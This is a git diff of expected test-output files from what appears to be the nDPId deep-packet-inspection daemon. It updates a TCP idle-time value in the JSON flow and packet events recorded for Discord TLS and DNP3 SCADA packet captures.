-00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":42193,"flow_last_seen":42209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":42209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2886,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","server_names":"discord.com,sni.cloudflaressl.com,*.discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC 
CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"31:3B:70:94:D5:DF:90:78:9C:A0:74:26:20:24:E4:3D:92:A7:57:9D"}} -00788{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":42193,"flow_last_seen":42247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":42247,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"}} +00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":42193,"flow_last_seen":42193,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":42193,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":42193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":42193,"pkt":"UlQAEjUCCAAnW\/mGCABFAAA8+ptAAEAGEIkKAAIPop+A6adSAbuGXfMIAAAAAKAC+vDjjQAAAgQFtAQCCAqmenD7AAAAAAEDAwc="} +00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":42208,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":42208,"pkt":"CAAnW\/mGUlQAEjUCCABFAAAsAYYAAEAGSa+in4DpCgACDwG7p1IAKQQBhl3zCWAS\/\/9B4AAAAgQFtA=="} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":42209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":42209,"pkt":"UlQAEjUCCAAnW\/mGCABFAADY+p1AAEAGD+sKAAIPop+A6adSAbuGXfMJACkEAlAY+vBAZwAAFgMBAKsBAACnAwPx8xjD5ySSyjBvN4nq\/yhxDwDcyJh8lqatQ2ebeRUbCgAAGMArwCzMqcAvwDDMqMATwBQAnACdAC8ANQEAAGb\/AQABAAAAABAADgAAC2Rpc2NvcmQuY29tABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEABQAFAQAAAAAAEAAOAAwCaDIIaHR0cC8xLjEACwACAQAACgAIAAYAHQAXABg="} 
+00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":42193,"flow_last_seen":42209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":42209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2886,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","server_names":"discord.com,sni.cloudflaressl.com,*.discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"31:3B:70:94:D5:DF:90:78:9C:A0:74:26:20:24:E4:3D:92:A7:57:9D"}} +00788{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":42193,"flow_last_seen":42247,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":42247,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"}} 00542{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":3306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":42247} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7/7 diff --git a/test/results/dnp3.pcap.out b/test/results/dnp3.pcap.out index e56ae66e7..33a43687a 100644 --- a/test/results/dnp3.pcap.out +++ b/test/results/dnp3.pcap.out 
@@ -1,60 +1,60 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dnp3.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1097501938503} -00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097501938503,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097501938503,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097501938503,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097501938503,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":40,"packets-processed":39,"total-skipped-flows":0,"total-l4-data-len":345,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1097502623045} 
-00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097502623045,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097502623045,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} 
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097502623045,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097502623045,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":79,"packets-processed":78,"total-skipped-flows":0,"total-l4-data-len":540,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1097504102255} -00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097504102255,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097504102255,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
